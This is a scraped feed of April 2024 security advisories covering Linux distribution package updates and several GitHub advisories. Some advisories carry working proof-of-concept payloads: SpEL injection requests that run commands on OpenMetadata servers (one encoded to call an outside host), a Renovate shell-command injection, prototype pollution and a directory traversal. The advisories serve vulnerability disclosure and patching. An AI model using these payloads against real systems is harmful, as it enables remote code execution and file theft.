22.04.2024 03:00:00	oraclelinux	[ELSA-2024-1825] java-17-openjdk security update (moderate)	[17.0.11.0.9-2.0.1]- Add Oracle vendor bug URL[1:17.0.11.0.9-2]- Update to jdk-17.0.11+9 (GA)- Add openjdk-17.0.11+9.tar.xz to .gitignore- Sync java-17-openjdk-portable.specfile from openjdk-portable-rhel-8- Update buildver from 7 to 9- Update portablerelease from 1 to 3- Change is_ga from 0 to 1 to enable GA mode for release- Update tzdata Requires comment to mention that 2024a is not yet in the buildroot- Update tzdata BuildRequires comment to mention that 2024a is not yet in the buildroot- Update tzdata BuildRequires fro 2023c to 2023d- Update sources from openjdk-17.0.11+7-ea.tar.xz to openjdk-17.0.11+9.tar.xz- Resolves: RHEL-27137- This tarball is embargoed until 2024-04-16 @ 1pm PT. [1:17.0.11.0.7-0.2.ea]- Update to jdk-17.0.11+7 (EA)- Sync java-17-openjdk-portable.specfile- Sync java-17-openjdk-portable.specfile again to mention OPENJDK-2730- Related: RHEL-27137[1:17.0.11.0.6-0.2.ea]- Update to jdk-17.0.11+6 (EA)- Sync java-17-openjdk-portable.specfile- Update buildjdkver to match the featurever- Use featurever macro to specify fips patch- Explain patchN syntax situation in a comment- generate_source_tarball.sh: Fix whitespace- generate_source_tarball.sh: Skip -ga tags- generate_source_tarball.sh: Get -ea suffix from version-numbers.conf- generate_source_tarball.sh: Use git archive to generate tarball- generate_source_tarball.sh: Update version in comment- generate_source_tarball.sh: Remove trailing period in echo- generate_source_tarball.sh: Add indentation instructions for Emacs- Require tzdata 2023d (JDK-8322725)- generate_source_tarball.sh: Add license- openjdk_news.sh: Use grep -E instead of egrep- Remove RH1649512 patch for libjpeg-turbo FAR macro- Move pcsc-lite-libs patch to in-need-of-upstreaming section- Related: RHEL-27137	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1825
20.04.2024 15:00:55	opensuse	[openSUSE-SU-2024:0112-1] Security update for perl-CryptX (moderate)	Security update for perl-CryptX	https://secdb.nttzen.cloud/security-advisory/opensuse/openSUSE-SU-2024:0112-1
22.04.2024 11:21:39	almalinux	[ALSA-2024:1912] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1912
22.04.2024 11:24:12	almalinux	[ALSA-2024:1908] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:1908
21.04.2024 03:00:00	freebsd	[FREEBSD:9BED230F-FFC8-11EE-8E76-A8A1599412C6] chromium -- multiple security fixes (high)	Chrome Releases reports: This update includes 23 security fixes: [331358160] High CVE-2024-3832: Object corruption in V8. Reported by Man Yue Mo of GitHub Security Lab on 2024-03-27 [331383939] High CVE-2024-3833: Object corruption in WebAssembly. Reported by Man Yue Mo of GitHub Security Lab on 2024-03-27 [330759272] High CVE-2024-3914: Use after free in V8. Reported by Seunghyun Lee (@0x10n) of KAIST Hacking Lab, via Pwn2Own 2024 on 2024-03-21 [326607008] High CVE-2024-3834: Use after free in Downloads. Reported by ChaobinZhang on 2024-02-24 [41491379] Medium CVE-2024-3837: Use after free in QUIC. Reported by {rotiple, dch3ck} of CW Research Inc. on 2024-01-15 [328278717] Medium CVE-2024-3838: Inappropriate implementation in Autofill. Reported by Ardyan Vicky Ramadhan on 2024-03-06 [41491859] Medium CVE-2024-3839: Out of bounds read in Fonts. Reported by Ronald Crane (Zippenhop LLC) on 2024-01-16 [41493458] Medium CVE-2024-3840: Insufficient policy enforcement in Site Isolation. Reported by Ahmed ElMasry on 2024-01-22 [330376742] Medium CVE-2024-3841: Insufficient data validation in Browser Switcher. Reported by Oleg on 2024-03-19 [41486690] Medium CVE-2024-3843: Insufficient data validation in Downloads. Reported by Azur on 2023-12-24 [40058873] Low CVE-2024-3844: Inappropriate implementation in Extensions. Reported by Alesandro Ortiz on 2022-02-23 [323583084] Low CVE-2024-3845: Inappropriate implementation in Network. Reported by Daniel Baulig on 2024-02-03 [40064754] Low CVE-2024-3846: Inappropriate implementation in Prompts. Reported by Ahmed ElMasry on 2023-05-23 [328690293] Low CVE-2024-3847: Insufficient policy enforcement in WebUI. Reported by Yan Zhu on 2024-03-08	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:9BED230F-FFC8-11EE-8E76-A8A1599412C6
24.04.2024 01:33:22	slackware	[SSA:2024-114-01] ruby	New ruby packages are available for Slackware 15.0 and -current tofix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/ruby-3.0.7-i586-1_slack15.0.txz: Upgraded. This update fixes security issues: Arbitrary memory address read vulnerability with Regex search. RCE vulnerability with .rdoc_options in RDoc. Buffer overread vulnerability in StringIO. For more information, see: https://www.ruby-lang.org/en/news/2024/04/23/arbitrary-memory-address-read-regexp-cve-2024-27282/ https://www.ruby-lang.org/en/news/2024/03/21/rce-rdoc-cve-2024-27281/ https://www.ruby-lang.org/en/news/2024/03/21/buffer-overread-cve-2024-27280/ https://www.cve.org/CVERecord?id=CVE-2024-27282 https://www.cve.org/CVERecord?id=CVE-2024-27281 https://www.cve.org/CVERecord?id=CVE-2024-27280 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/ruby-3.0.7-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/ruby-3.0.7-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/ruby-3.3.1-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/ruby-3.3.1-x86_64-1.txzMD5 signaturesSlackware 15.0 package:499174156baaa426ad71cbd34fdf7fd0 ruby-3.0.7-i586-1_slack15.0.txzSlackware x86_64 15.0 package:978395a7eccefb9f956beb3bd35944e8 ruby-3.0.7-x86_64-1_slack15.0.txzSlackware -current package:a235c65ee15b71aa96b1759ee081d4c4 d/ruby-3.3.1-i586-1.txzSlackware x86_64 -current package:01a7ba4fe0a608de700296a506f559f0 d/ruby-3.3.1-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg ruby-3.0.7-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-114-01
24.04.2024 00:15:57	npm	[NPM:GHSA-624G-8QJG-8QXF] Conform contains a Prototype Pollution Vulnerability in `parseWith...` function (high)	### SummaryConform allows the parsing of nested objects in the form of `object.property`. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to `parseWith...` functions.### PoC```javascriptconst { parseWithZod } = require('@conform-to/zod');const { z } = require("zod");const param = new URLSearchParams("__proto__.pollution=polluted");const schema = z.object({ "a": z.string() });parseWithZod(param, { schema });console.log("pollution:", ({}).pollution); // should print "polluted"```### DetailsThe invocation of the `parseWithZod` function in the above PoC triggers the `setValue` function through `getSubmissionContext` and `parse`, executing the following process, resulting in prototype pollution:```javascriptlet pointer = value;pointer.__proto__ = pointer.__proto__;pointer = pointer.__proto__;pointer.polluted = "polluted";```This is caused by the lack of object existence checking on [line 117 in formdata.ts](https://github.com/edmundhung/conform/blob/59156d7115a7207fa3b6f8a70a4342a9b24c2501/packages/conform-dom/formdata.ts#L117), where the code only checks for the presence of `pointer[key]` without proper validation.### ImpactApplications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-624G-8QJG-8QXF
24.04.2024 00:11:24	maven	[MAVEN:GHSA-7VF4-X5M2-R6GR] OpenMetadata vulnerable to SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`) (critical)	### SpEL Injection in `PUT /api/v1/policies` (`GHSL-2023-252`)Please note, only authorized and admin role users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability `CompiledRule::validateExpression` is also called from [`PolicyRepository.prepare`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/PolicyRepository.java#L113)```java @Override public void prepare(Policy policy, boolean update) { validateRules(policy); } ... public void validateRules(Policy policy) { List<Rule> rules = policy.getRules(); if (nullOrEmpty(rules)) { throw new IllegalArgumentException(CatalogExceptionMessage.EMPTY_RULES_IN_POLICY); } // Validate all the expressions in the rule for (Rule rule : rules) { CompiledRule.validateExpression(rule.getCondition(), Boolean.class); rule.getResources().sort(String.CASE_INSENSITIVE_ORDER); rule.getOperations().sort(Comparator.comparing(MetadataOperation::value)); // Remove redundant resources rule.setResources(filterRedundantResources(rule.getResources())); // Remove redundant operations rule.setOperations(filterRedundantOperations(rule.getOperations())); } rules.sort(Comparator.comparing(Rule::getName)); }````prepare()` is called from [`EntityRepository.prepareInternal()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EntityRepository.java#L693) which, in turn, gets called from the [`EntityResource.createOrUpdate()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/EntityResource.java#L219):```javapublic Response createOrUpdate(UriInfo uriInfo, SecurityContext securityContext, T entity) { repository.prepareInternal(entity, true); // If entity does not exist, this is a create operation, else update operation ResourceContext<T> resourceContext = getResourceContextByName(entity.getFullyQualifiedName()); MetadataOperation operation = createOrUpdateOperation(resourceContext); OperationContext operationContext = new OperationContext(entityType, operation); if (operation == CREATE) { CreateResourceContext<T> createResourceContext = new CreateResourceContext<>(entityType, entity); authorizer.authorize(securityContext, operationContext, createResourceContext); entity = addHref(uriInfo, repository.create(uriInfo, entity)); return new PutResponse<>(Response.Status.CREATED, entity, RestUtil.ENTITY_CREATED).toResponse(); } authorizer.authorize(securityContext, operationContext, resourceContext); PutResponse<T> response = repository.createOrUpdate(uriInfo, entity); addHref(uriInfo, response.getEntity()); return response.toResponse();}```Note that even though there is an authorization check (`authorizer.authorize()`), it gets called after `prepareInternal()` gets called and therefore after the SpEL expression has been evaluated.In order to reach this method, an attacker can send a PUT request to `/api/v1/policies` which gets handled by [`PolicyResource.createOrUpdate()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L365):```java@PUT@Operation( operationId = "createOrUpdatePolicy", summary = "Create or update a policy", description = "Create a new policy, if it does not exist or update an existing policy.", responses = { @ApiResponse( responseCode = "200", description = "The policy", content = @Content(mediaType = "application/json", schema = @Schema(implementation = Policy.class))), @ApiResponse(responseCode = "400", description = "Bad request") })public Response createOrUpdate( @Context UriInfo uriInfo, @Context SecurityContext securityContext, @Valid CreatePolicy create) { Policy policy = getPolicy(create, securityContext.getUserPrincipal().getName()); return createOrUpdate(uriInfo, securityContext, policy);}```This vulnerability was discovered with the help of CodeQL's [Expression language injection (Spring)](https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection/) query.#### Proof of concept- Prepare the payload - Encode the command to be run (eg: `touch /tmp/pwned`) using Base64 (eg: `dG91Y2ggL3RtcC9wd25lZA==`) - Create the SpEL expression to run the system command: `T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))`- Send the payload using a valid JWT token:```httpPUT /api/v1/policies HTTP/1.1Host: localhost:8585sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"Authorization: Bearer <non-admin JWT>accept: application/jsonConnection: closeContent-Type: application/jsonContent-Length: 367{"name":"TeamOnlyPolicy","rules":[{"name":"TeamOnlyPolicy-Rule","description":"Deny all the operations on all the resources for all outside the team hierarchy..","effect":"deny","operations":["All"],"resources":["All"],"condition":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode('dG91Y2ggL3RtcC9wd25lZA==')))"}]}```- Verify that a file called `/tmp/pwned` was created in the OpenMetadata server#### ImpactThis issue may lead to Remote Code Execution.#### RemediationUse [`SimpleEvaluationContext`](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html) to exclude references to Java types, constructors, and bean references.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7VF4-X5M2-R6GR
23.04.2024 20:37:06	ubuntu	[USN-6742-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6742-2
23.04.2024 19:21:10	npm	[NPM:GHSA-RQGV-292V-5QGR] Renovate vulnerable to arbitrary command injection via helmv3 manager and registryAliases (moderate)	### SummaryAttackers with commit access to the default branch of a repo using Renovate could manipulate helmv3 registryAliases to execute arbitrary commands.### DetailsSince [#26848](https://github.com/renovatebot/renovate/pull/26848), `registryAliases` has become mergeable. This means that the helmv3 manager started honoring its value and uses a `helm repo add <key> <parameters>` command for each defined alias. See source code: https://github.com/renovatebot/renovate/blob/23f3df6216375cb5bcfe027b0faee304f877f891/lib/modules/manager/helmv3/artifacts.ts#L80The key was not quoted, leading to the ability to use variable references (`$FOO`) in it and have them printed by Renovate on the pull request, or even running any shell commands.### PoCInside a repository where Renovate runs, add a Helm chart with an outdated dependency, for example:test-chart/Chart.yaml:```apiVersion: v2name: redisversion: 1.0.0dependencies: - name: redis version: 18.13.10 repository: oci://registry-1.docker.io/bitnamicharts```test-chart/Chart.lock:```dependencies:- name: redis repository: oci://registry-1.docker.io/bitnamicharts version: 18.13.10digest: sha256:11267bd32ea6c5c120ddebbb9f21e4a3c7700a961aa1a27ddb55df1fb8059a38generated: "2024-02-16T13:31:20.807026334Z"```Then add the following `renovate.json`:```json{ "$schema": "https://docs.renovatebot.com/renovate-schema.json", "extends": [ "config:base" ], "registryAliases": { "foo/bar \|\| sh -c 'ls /; exit 1' >&2": "registry.example.com/proxy" }}```Once Renovate runs on the repository, it will create a pull request, and add a comment titled "Artifact update problem" containing the following text:```File name: test-chart/Chart.lockCommand failed: helm repo add foo/bar \|\| sh -c 'ls /; exit 1' >&2 registry.example.com/proxy --force-updateError: "helm repo add" requires 2 argumentsUsage: helm repo add [NAME] [URL] [flags]binbootdevetcgohomeliblib32lib64libx32mediamntoptprocrootrunsbinsrvsystmpusrvar```This shows that the `ls` command executed successfully, and we can even see its output.Note that redirecting any output you want to see to stderr (`>&2`) and making sure the final command fails (`exit 1`) is required in this case, as Renovate only adds a comment if the command fails, and it contains only stderr (not stdout) output.### ImpactAll Renovate versions from 37.158.0 up until 37.199.0 were affected. This vulnerability allows full access to Renovate's execution environment. The level of severity depends on how Renovate is deployed (Docker, Kubernetes, CI pipeline, ...) and whether Renovate is being offered to untrusted users/repositories.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RQGV-292V-5QGR
23.04.2024 19:20:50	npm	[NPM:GHSA-3MPF-RCC7-5347] Hono vulnerable to Restricted Directory Traversal in serveStatic with deno (moderate)	### SummaryWhen using serveStatic with deno, it is possible to directory traverse where main.ts is located.My environment is configured as per this tutorialhttps://hono.dev/getting-started/deno### PoC```bash$ tree.├── deno.json├── deno.lock├── main.ts├── README.md└── static └── a.txt```source```jsximport { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'const app = new Hono()app.use('/static/*', serveStatic({ root: './' }))Deno.serve(app.fetch)```request```bashcurl localhost:8000/static/%2e%2e/main.ts```response is content of main.ts### ImpactUnexpected files are retrieved.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3MPF-RCC7-5347
23.04.2024 14:38:08	ubuntu	[USN-6746-1] Google Guest Agent and Google OS Config Agent vulnerability	Google Guest Agent and OS Config Agent could be made to crashif it open a specially crafted JSON.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6746-1
23.04.2024 14:20:04	ubuntu	[USN-6728-3] Squid vulnerability (high)	Squid could be made to crash if it received specially crafted networktraffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6728-3
23.04.2024 23:50:58	npm	[NPM:GHSA-4RCH-2FH8-94VW] MySQL2 for Node Arbitrary Code Injection (critical)	Versions of the package mysql2 before 3.9.7 are vulnerable to Arbitrary Code Injection due to improper sanitization of the timezone parameter in the readCodeFor function by calling a native MySQL Server date/time function.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4RCH-2FH8-94VW
23.04.2024 03:00:00	cisa	[CISA-2024:0423] CISA Adds One Known Exploited Vulnerability to Catalog (high)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0423
23.04.2024 03:00:00	debian	[DSA-5673-1] glibc	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5673-1
23.04.2024 03:00:00	oraclelinux	[ELSA-2024-1818] java-1.8.0-openjdk security update (moderate)	[1:1.8.0.412.b08-2.0.1]- Add Oracle vendor bug URL [Orabug: 34340155]	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1818
23.04.2024 03:00:00	oraclelinux	[ELSA-2024-1822] java-11-openjdk security update (moderate)	[1:11.0.23.0.9-3.0.1]- Add Oracle vendor bug URL [Orabug: 34340155][1:11.0.23.0.9-2]- Fix 11.0.22 release date in NEWS[1:11.0.23.0.9-1]- Update to jdk-11.0.23+9 (GA)- Update release notes to 11.0.23+9- Switch to GA mode for release- Require tzdata 2024a due to upstream inclusion of JDK-8322725- Only require tzdata 2023d for now as 2024a is unavailable in buildroot- This tarball is embargoed until 2024-04-16 @ 1pm PT. - Resolves: RHEL-30920[1:11.0.23.0.1-0.1.ea]- Update to jdk-11.0.23+1 (EA)- Update release notes to 11.0.23+1- Switch to EA mode	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1822
23.04.2024 03:00:00	oraclelinux	[ELSA-2024-1940] owO: thunderbird security update (low)	[115.10.0-2.0.1]- Add Oracle prefs- Add OpenELA debranding[115.10.0-2]- Update to 115.10.0 build2[115.10.0-1]- Update to 115.10.0 build1- Revert expat CVE-2023-52425 fix	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1940
23.04.2024 03:00:00	oraclelinux	[ELSA-2024-1963] golang security update (important)	[1.20.12-4]- Rebuild for z-stream- Related: RHEL-28939[1.20.12-3]- Fix CVE-2023-45288- Resolves: RHEL-28939- Temporarily disable FIPS tests (RHELBLD-14822)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1963
23.04.2024 03:00:00	oraclelinux	[ELSA-2024-1998] libreswan security update (moderate)	[4.12-2.0.1.2]- Add libreswan-oracle.patch to detect Oracle Linux distro[4.12-2.2]- Fix patch application in the previous change[4.12-2.1]- Fix CVE-2024-2357 (RHEL-28742)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1998
23.04.2024 03:00:00	oraclelinux	[ELSA-2024-1828] java-21-openjdk security update (moderate)	[1:21.0.3.0.9-1.0.1]- Add Oracle vendor bug URL [Orabug: 34340155][1:21.0.3.0.9-1]- Update to jdk-21.0.3+9 (GA)- Update release notes to 21.0.3+9- Switch to GA mode.- Sync the copy of the portable specfile with the latest update- This tarball is embargoed until 2024-04-16 @ 1pm PT. - Resolves: RHEL-32405[1:21.0.3.0.7-0.1.ea]- Update to jdk-21.0.3+7 (EA)- Update release notes to 21.0.3+7- Require tzdata 2024a due to upstream inclusion of JDK-8322725- Only require tzdata 2023d for now as 2024a is unavailable in buildroot- Drop JDK-8009550 which is now available upstream- Re-generate FIPS patch against 21.0.3+7 following backport of JDK-8325254- Resolves: RHEL-30944[1:21.0.3.0.1-0.2.ea]- Invoke xz in multi-threaded mode- generate_source_tarball.sh: Add WITH_TEMP environment variable- generate_source_tarball.sh: Multithread xz on all available cores- generate_source_tarball.sh: Add OPENJDK_LATEST environment variable- generate_source_tarball.sh: Update comment about tarball naming- generate_source_tarball.sh: Reformat comment header- generate_source_tarball.sh: Reformat and update help output- generate_source_tarball.sh: Do a shallow clone, for speed- generate_source_tarball.sh: Append -ea designator when required- generate_source_tarball.sh: Eliminate some removal prompting- generate_source_tarball.sh: Make tarball reproducible- generate_source_tarball.sh: Prefix temporary directory with temp-- generate_source_tarball.sh: Remove temporary directory exit conditions- generate_source_tarball.sh: Fix -ea logic to add dash- generate_source_tarball.sh: Set compile-command in Emacs- generate_source_tarball.sh: Remove REPO_NAME from FILE_NAME_ROOT- generate_source_tarball.sh: Move PROJECT_NAME and REPO_NAME checks- generate_source_tarball.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- generate_source_tarball.sh: shellcheck: Double-quote variable references (SC2086)- generate_source_tarball.sh: shellcheck: Do not use -a (SC2166)- generate_source_tarball.sh: shellcheck: Do not use $ on arithmetic variables (SC2004)- Use backward-compatible patch syntax- generate_source_tarball.sh: Ignore -ga tags with OPENJDK_LATEST- generate_source_tarball.sh: Fix whitespace- generate_source_tarball.sh: Remove trailing period in echo- generate_source_tarball.sh: Use long-style argument to grep- generate_source_tarball.sh: Add license- generate_source_tarball.sh: Add indentation instructions for Emacs- Related: RHEL-30944[1:21.0.3.0.1-0.2.ea]- Install alt-java man page from the misc tarball as it is no longer in the JDK image- generate_source_tarball.sh: Update examples in header for clarity- generate_source_tarball.sh: Cleanup message issued when checkout already exists- generate_source_tarball.sh: Create directory in TMPDIR when using WITH_TEMP- generate_source_tarball.sh: Only add --depth=1 on non-local repositories- Move maintenance scripts to a scripts subdirectory- discover_trees.sh: Set compile-command and indentation instructions for Emacs- discover_trees.sh: shellcheck: Do not use -o (SC2166)- discover_trees.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- discover_trees.sh: shellcheck: Double-quote variable references (SC2086)- generate_source_tarball.sh: Add authorship- icedtea_sync.sh: Set compile-command and indentation instructions for Emacs- icedtea_sync.sh: shellcheck: Double-quote variable references (SC2086)- icedtea_sync.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- openjdk_news.sh: Set compile-command and indentation instructions for Emacs- openjdk_news.sh: shellcheck: Double-quote variable references (SC2086)- openjdk_news.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)- openjdk_news.sh: shellcheck: Remove deprecated egrep usage (SC2196)- generate_source_tarball.sh: Output values of new options WITH_TEMP and OPENJDK_LATEST- generate_source_tarball.sh: Double-quote DEPTH reference (SC2086)- generate_source_tarball.sh: Avoid empty DEPTH reference while still appeasing shellcheck- Related: RHEL-30944[1:21.0.3.0.1-0.1.ea]- Update to jdk-21.0.3+1 (EA)- Update release notes to 21.0.3+1- Switch to EA mode- Require tzdata 2023d due to upstream inclusion of JDK-8322725- Bump FreeType version to 2.13.2 following JDK-8316028- Related: RHEL-30944[1:21.0.2.0.13-2]- Sync the copy of the portable specfile with the latest update- Define portablesuffix according to whether pkgos is defined or not- Related: RHEL-30944	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-1828
25.04.2024 01:56:25	ubuntu	[USN-6743-3] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6743-3
24.04.2024 22:55:01	ubuntu	[USN-6657-2] Dnsmasq vulnerabilities (high)	Several security issues were fixed in Dnsmasq.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6657-2
24.04.2024 20:25:53	ubuntu	[USN-6749-1] FreeRDP vulnerabilities (critical)	Several security issues were fixed in FreeRDP.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6749-1
24.04.2024 20:06:02	maven	[MAVEN:GHSA-5XV3-FM7G-865R] OpenMetadata vulnerable to a SpEL Injection in `GET /api/v1/policies/validation/condition/` (`GHSL-2023-236`) (high)	### SpEL Injection in `GET /api/v1/policies/validation/condition/<expr>` (`GHSL-2023-236`)*Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability. A user must exist in OpenMetadata and have authenticated themselves to exploit this vulnerability.The [`‎CompiledRule::validateExpression`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L51) method evaluates an SpEL expression using an [`StandardEvaluationContext`](https://github.com/open-metadata/OpenMetadata/blob/main/openmetadata-service/src/main/java/org/openmetadata/service/security/policyevaluator/CompiledRule.java#L57), allowing the expression to reach and interact with Java classes such as `java.lang.Runtime`, leading to Remote Code Execution. The `/api/v1/policies/validation/condition/<expression>` endpoint passes user-controlled data `CompiledRule::validateExpession` allowing authenticated (non-admin) users to execute arbitrary system commands on the underlaying operating system.[Snippet from PolicyResource.java](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/resources/policies/PolicyResource.java#L448)```java @GET @Path("/validation/condition/{expression}") @Operation( operationId = "validateCondition", summary = "Validate a given condition", description = "Validate a given condition expression used in authoring rules.", responses = { @ApiResponse(responseCode = "204", description = "No value is returned"), @ApiResponse(responseCode = "400", description = "Invalid expression") }) public void validateCondition( @Context UriInfo uriInfo, @Context SecurityContext securityContext, @Parameter(description = "Expression of validating rule", schema = @Schema(type = "string")) @PathParam("expression") String expression) { CompiledRule.validateExpression(expression, Boolean.class); }``````java public static <T> void validateExpression(String condition, Class<T> clz) { if (condition == null) { return; } Expression expression = parseExpression(condition); RuleEvaluator ruleEvaluator = new RuleEvaluator(); StandardEvaluationContext evaluationContext = new StandardEvaluationContext(ruleEvaluator); try { expression.getValue(evaluationContext, clz); } catch (Exception exception) { // Remove unnecessary class details in the exception message String message = exception.getMessage().replaceAll("on type .$", "").replaceAll("on object .$", ""); throw new IllegalArgumentException(CatalogExceptionMessage.failedToEvaluate(message)); } }```In addition, there is a missing authorization check since `Authorizer.authorize()` is never called in the affected path and therefore any authenticated non-admin user is able to trigger this endpoint and evaluate arbitrary SpEL expressions leading to arbitrary command execution.This vulnerability was discovered with the help of CodeQL's [Expression language injection (Spring)](https://codeql.github.com/codeql-query-help/java/java-spel-expression-injection/) query.#### Proof of concept- Prepare the payload - Encode `touch /tmp/pwned` in Base64 => `dG91Y2ggL3RtcC9wd25lZA==` - SpEL expression to run system command: `T(java.lang.Runtime).getRuntime().exec(new java.lang.String(T(java.util.Base64).getDecoder().decode("dG91Y2ggL3RtcC9wd25lZA==")))` - Encode the payload using URL encoding:```%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%54%28%6a%61%76%61%2e%75%74%69%6c%2e%42%61%73%65%36%34%29%2e%67%65%74%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%28%22%64%47%39%31%59%32%67%67%4c%33%52%74%63%43%39%77%64%32%35%6c%5a%41%3d%3d%22%29%29%29```- Send the payload using a valid JWT token:```httpGET /api/v1/policies/validation/condition/%54%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%54%28%6a%61%76%61%2e%75%74%69%6c%2e%42%61%73%65%36%34%29%2e%67%65%74%44%65%63%6f%64%65%72%28%29%2e%64%65%63%6f%64%65%28%22%62%6e%4e%73%62%32%39%72%64%58%41%67%61%58%70%73%4e%7a%45%33%62%33%42%69%62%57%52%79%5a%57%46%6f%61%33%4a%6f%63%44%4e%72%63%32%70%72%61%47%4a%75%4d%6d%4a%7a%65%6d%67%75%62%32%46%7a%64%47%6c%6d%65%53%35%6a%62%32%30%3d%22%29%29%29 HTTP/2Host: sandbox.open-metadata.orgAuthorization: Bearer <non-admin JWT>```- Verify that a file called `/tmp/pwned` was created in the OpenMetadata server#### ImpactThis issue may lead to Remote Code Execution by a registered and authenticated user.#### RemediationUse [`SimpleEvaluationContext`](https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html) to exclude references to Java types, constructors, and bean references*.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5XV3-FM7G-865R
24.04.2024 20:06:01	maven	[MAVEN:GHSA-8P5R-6MVV-2435] OpenMetadata vulnerable to a SpEL Injection in `PUT /api/v1/events/subscriptions` (`GHSL-2023-251`) (high)	### SpEL Injection in `PUT /api/v1/events/subscriptions` (`GHSL-2023-251`)*Please note, only authenticated users have access to PUT / POST APIS for /api/v1/policies. Non authenticated users will not be able to access these APIs to exploit the vulnerability. A user must exist in OpenMetadata and have authenticated themselves to exploit this vulnerability.Similarly to the GHSL-2023-250 issue, `AlertUtil::validateExpression` is also called from [`EventSubscriptionRepository.prepare()`](https://github.com/open-metadata/OpenMetadata/blob/b6b337e09a05101506a5faba4b45d370cc3c9fc8/openmetadata-service/src/main/java/org/openmetadata/service/jdbi3/EventSubscriptionRepository.java#L69-L83), which can lead to Remote Code Execution.```java @Override public void prepare(EventSubscription entity, boolean update) { validateFilterRules(entity); } private void validateFilterRules(EventSubscription 